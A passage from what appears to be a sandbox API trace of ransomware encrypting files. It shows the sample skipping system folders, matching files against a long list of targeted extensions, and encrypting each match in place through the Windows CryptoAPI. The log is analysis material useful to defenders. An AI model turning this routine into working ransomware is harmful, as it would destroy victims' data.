Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab" [0026.359] PathFindExtensionW (pszPath="InfLR.cab") returned=".cab" [0026.359] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".cab.") returned=".cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip." [0026.359] CryptDuplicateKey (in: hKey=0x37f480, pdwReserved=0x0, dwFlags=0x0, phKey=0x31ce05c | out: phKey=0x31ce05c*=0x3683b0) returned 1 [0026.359] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\inflr.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0026.359] GetFileSizeEx (in: hFile=0x22c, lpFileSize=0x31ce040 | out: lpFileSize=0x31ce040*=18874884) returned 1 [0026.359] CreateFileMappingW (hFile=0x22c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1200226, lpName=0x0) returned 0x230 [0026.359] GetSystemInfo (in: lpSystemInfo=0x31cdfe4 | out: lpSystemInfo=0x31cdfe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0026.359] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x1200000, dwNumberOfBytesToMap=0x204) returned 0xa0000 [0026.361] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0026.361] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1000000) returned 0x3240000 [0026.362] CryptEncrypt (in: hKey=0x3683b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3240000*, pdwDataLen=0x31ce070*=0x1000000, dwBufLen=0x1200204 | out: pbData=0x3240000*, pdwDataLen=0x31ce070*=0x1000000) returned 1 [0026.846] FlushViewOfFile (lpBaseAddress=0x3240000, dwNumberOfBytesToFlush=0x1000000) returned 1 [0026.972] UnmapViewOfFile (lpBaseAddress=0x3240000) returned 1 [0026.995] GetSystemInfo (in: lpSystemInfo=0x31cdfe4 | out: lpSystemInfo=0x31cdfe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0026.995] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x1200000, dwNumberOfBytesToMap=0x226) returned 0xa0000 [0026.996] CryptDuplicateHash (in: hHash=0x368270, pdwReserved=0x0, dwFlags=0x0, phHash=0x31ce020 | out: phHash=0x31ce020) returned 1 [0026.997] CryptHashData (hHash=0x368430, pbData=0xa0200, dwDataLen=0x4, dwFlags=0x0) returned 1 [0026.997] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x36ea40 [0026.997] CryptGetHashParam (in: hHash=0x368430, dwParam=0x2, pbData=0x36ea40, pdwDataLen=0x31ce010, dwFlags=0x0 | out: pbData=0x36ea40, pdwDataLen=0x31ce010) returned 1 [0026.997] FlushViewOfFile (lpBaseAddress=0xa0000, dwNumberOfBytesToFlush=0x226) returned 1 [0026.998] LocalFree (hMem=0x36ea40) returned 0x0 [0026.998] CryptDestroyHash (hHash=0x368430) returned 1 [0026.998] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0026.998] CloseHandle (hObject=0x230) returned 1 [0026.998] CloseHandle (hObject=0x22c) returned 1 [0027.192] CryptDestroyKey (hKey=0x3683b0) returned 1 [0027.192] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0027.192] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0027.192] PathCombineW (in: pszDest=0x31ce2d8, pszDir="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C", pszFile="InfoPathMUI.msi" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi" [0027.192] PathFindExtensionW (pszPath="InfoPathMUI.msi") returned=".msi" [0027.192] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".msi.") returned 0x0 [0027.192] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0027.192] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0027.192] PathCombineW (in: pszDest=0x31ce2d8, pszDir="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C", pszFile="InfoPathMUI.xml" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml" [0027.192] PathFindExtensionW (pszPath="InfoPathMUI.xml") returned=".xml" [0027.192] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".xml.") returned=".xml.xvd.zip." [0027.192] CryptDuplicateKey (in: hKey=0x37f480, pdwReserved=0x0, dwFlags=0x0, phKey=0x31ce05c | out: phKey=0x31ce05c*=0x3683b0) returned 1 [0027.192] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0027.193] GetFileSizeEx (in: hFile=0x22c, lpFileSize=0x31ce040 | out: lpFileSize=0x31ce040*=1231) returned 1 [0027.193] CreateFileMappingW (hFile=0x22c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4f2, lpName=0x0) returned 0x230 [0027.193] GetSystemInfo (in: lpSystemInfo=0x31cdfe4 | out: lpSystemInfo=0x31cdfe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0027.193] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4cf) returned 0xa0000 [0027.194] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0027.194] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4cf) returned 0xa0000 [0027.195] CryptEncrypt (in: hKey=0x3683b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa0000*, pdwDataLen=0x31ce070*=0x4cf, dwBufLen=0x4d0 | out: pbData=0xa0000*, pdwDataLen=0x31ce070*=0x4d0) returned 1 [0027.195] FlushViewOfFile (lpBaseAddress=0xa0000, dwNumberOfBytesToFlush=0x4d0) returned 1 [0027.197] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0027.197] GetSystemInfo (in: lpSystemInfo=0x31cdfe4 | out: lpSystemInfo=0x31cdfe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0027.197] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4f2) returned 0xa0000 [0027.198] CryptDuplicateHash (in: hHash=0x368270, pdwReserved=0x0, dwFlags=0x0, phHash=0x31ce020 | out: phHash=0x31ce020) returned 1 [0027.198] CryptHashData (hHash=0x368430, pbData=0xa04cc, dwDataLen=0x4, dwFlags=0x0) returned 1 [0027.198] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x36ea40 [0027.198] CryptGetHashParam (in: hHash=0x368430, dwParam=0x2, pbData=0x36ea40, pdwDataLen=0x31ce010, dwFlags=0x0 | out: pbData=0x36ea40, pdwDataLen=0x31ce010) returned 1 [0027.198] FlushViewOfFile (lpBaseAddress=0xa0000, dwNumberOfBytesToFlush=0x4f2) returned 1 [0027.198] LocalFree (hMem=0x36ea40) returned 0x0 [0027.198] CryptDestroyHash (hHash=0x368430) returned 1 [0027.198] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0027.198] CloseHandle (hObject=0x230) returned 1 [0027.198] CloseHandle (hObject=0x22c) returned 1 [0027.199] CryptDestroyKey (hKey=0x3683b0) returned 1 [0027.199] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0027.199] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0027.200] PathCombineW (in: pszDest=0x31ce2d8, pszDir="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C", pszFile="Setup.xml" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml" [0027.200] PathFindExtensionW (pszPath="Setup.xml") returned=".xml" [0027.200] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".xml.") returned=".xml.xvd.zip." [0027.200] CryptDuplicateKey (in: hKey=0x37f480, pdwReserved=0x0, dwFlags=0x0, phKey=0x31ce05c | out: phKey=0x31ce05c*=0x3683b0) returned 1 [0027.200] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0027.200] GetFileSizeEx (in: hFile=0x22c, lpFileSize=0x31ce040 | out: lpFileSize=0x31ce040*=1852) returned 1 [0027.200] CreateFileMappingW (hFile=0x22c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x762, lpName=0x0) returned 0x230 [0027.200] GetSystemInfo (in: lpSystemInfo=0x31cdfe4 | out: lpSystemInfo=0x31cdfe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0027.200] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x73c) returned 0xa0000 [0027.201] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0027.201] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x73c) returned 0xa0000 [0027.202] CryptEncrypt (in: hKey=0x3683b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa0000*, pdwDataLen=0x31ce070*=0x73c, dwBufLen=0x740 | out: pbData=0xa0000*, pdwDataLen=0x31ce070*=0x740) returned 1 [0027.202] FlushViewOfFile (lpBaseAddress=0xa0000, dwNumberOfBytesToFlush=0x740) returned 1 [0027.204] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0027.204] GetSystemInfo (in: lpSystemInfo=0x31cdfe4 | out: lpSystemInfo=0x31cdfe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0027.204] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x762) returned 0xa0000 [0027.205] CryptDuplicateHash (in: hHash=0x368270, pdwReserved=0x0, dwFlags=0x0, phHash=0x31ce020 | out: phHash=0x31ce020) returned 1 [0027.205] CryptHashData (hHash=0x368430, pbData=0xa073c, dwDataLen=0x4, dwFlags=0x0) returned 1 [0027.205] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x36ea40 [0027.205] CryptGetHashParam (in: hHash=0x368430, dwParam=0x2, pbData=0x36ea40, pdwDataLen=0x31ce010, dwFlags=0x0 | out: pbData=0x36ea40, pdwDataLen=0x31ce010) returned 1 [0027.205] FlushViewOfFile (lpBaseAddress=0xa0000, dwNumberOfBytesToFlush=0x762) returned 1 [0027.205] LocalFree (hMem=0x36ea40) returned 0x0 [0027.205] CryptDestroyHash (hHash=0x368430) returned 1 [0027.205] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0027.206] CloseHandle (hObject=0x230) returned 1 [0027.206] CloseHandle (hObject=0x22c) returned 1 [0027.206] CryptDestroyKey (hKey=0x3683b0) returned 1 [0027.206] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 0 [0027.207] FindClose (in: hFindFile=0x368370 | out: hFindFile=0x368370) returned 1 [0027.207] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 1 [0027.207] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0027.207] PathCombineW (in: pszDest=0x31ce960, pszDir="C:\\MSOCache\\All Users", pszFile="{90140000-0054-0409-1000-0000000FF1CE}-C" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C") returned="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C" [0027.207] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C", lpSrch="\\Windows") returned 0x0 [0027.207] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C", lpSrch="\\Program Files") returned 0x0 [0027.207] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C", lpSrch="\\ProgramData") returned 0x0 [0027.207] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C", lpSrch="\\AppData") returned 0x0 [0027.207] PathCombineW (in: pszDest=0x31ce4e0, pszDir="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C", pszFile="*" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\*") returned="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\*" [0027.207] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 0x368370 [0027.207] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0027.207] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0027.207] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0027.207] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0027.207] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0027.207] PathCombineW (in: pszDest=0x31ce2d8, pszDir="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C", pszFile="Setup.xml" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml" [0027.207] PathFindExtensionW (pszPath="Setup.xml") returned=".xml" [0027.207] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".xml.") returned=".xml.xvd.zip." [0027.207] CryptDuplicateKey (in: hKey=0x37f480, pdwReserved=0x0, dwFlags=0x0, phKey=0x31ce05c | out: phKey=0x31ce05c*=0x3683b0) returned 1 [0027.207] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0027.208] GetFileSizeEx (in: hFile=0x22c, lpFileSize=0x31ce040 | out: lpFileSize=0x31ce040*=6241) returned 1 [0027.208] CreateFileMappingW (hFile=0x22c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1892, lpName=0x0) returned 0x230 [0027.208] GetSystemInfo (in: lpSystemInfo=0x31cdfe4 | out: lpSystemInfo=0x31cdfe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0027.208] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1861) returned 0xa0000 [0027.209] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0027.209] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1861) returned 0xa0000 [0027.210] CryptEncrypt (in: hKey=0x3683b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa0000*, pdwDataLen=0x31ce070*=0x1861, dwBufLen=0x1870 | out: pbData=0xa0000*, pdwDataLen=0x31ce070*=0x1870) returned 1 [0027.210] FlushViewOfFile (lpBaseAddress=0xa0000, dwNumberOfBytesToFlush=0x1870) returned 1 [0027.211] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0027.211] GetSystemInfo (in: lpSystemInfo=0x31cdfe4 | out: lpSystemInfo=0x31cdfe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0027.212] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1892) returned 0xa0000 [0027.212] CryptDuplicateHash (in: hHash=0x368270, pdwReserved=0x0, dwFlags=0x0, phHash=0x31ce020 | out: phHash=0x31ce020) returned 1 [0027.212] CryptHashData (hHash=0x368430, pbData=0xa186c, dwDataLen=0x4, dwFlags=0x0) returned 1 [0027.212] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x36ea40 [0027.212] CryptGetHashParam (in: hHash=0x368430, dwParam=0x2, pbData=0x36ea40, pdwDataLen=0x31ce010, dwFlags=0x0 | out: pbData=0x36ea40, pdwDataLen=0x31ce010) returned 1 [0027.212] FlushViewOfFile (lpBaseAddress=0xa0000, dwNumberOfBytesToFlush=0x1892) returned 1 [0027.213] LocalFree (hMem=0x36ea40) returned 0x0 [0027.213] CryptDestroyHash (hHash=0x368430) returned 1 [0027.213] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0027.213] CloseHandle (hObject=0x230) returned 1 [0027.213] CloseHandle (hObject=0x22c) returned 1 [0027.214] CryptDestroyKey (hKey=0x3683b0) returned 1 [0027.214] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0027.214] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0027.214] PathCombineW (in: pszDest=0x31ce2d8, pszDir="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C", pszFile="VisioLR.cab" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab" [0027.214] PathFindExtensionW (pszPath="VisioLR.cab") returned=".cab" [0027.214] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".cab.") returned=".cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip." [0027.214] CryptDuplicateKey (in: hKey=0x37f480, pdwReserved=0x0, dwFlags=0x0, phKey=0x31ce05c | out: phKey=0x31ce05c*=0x3683b0) returned 1 [0027.214] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiolr.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, 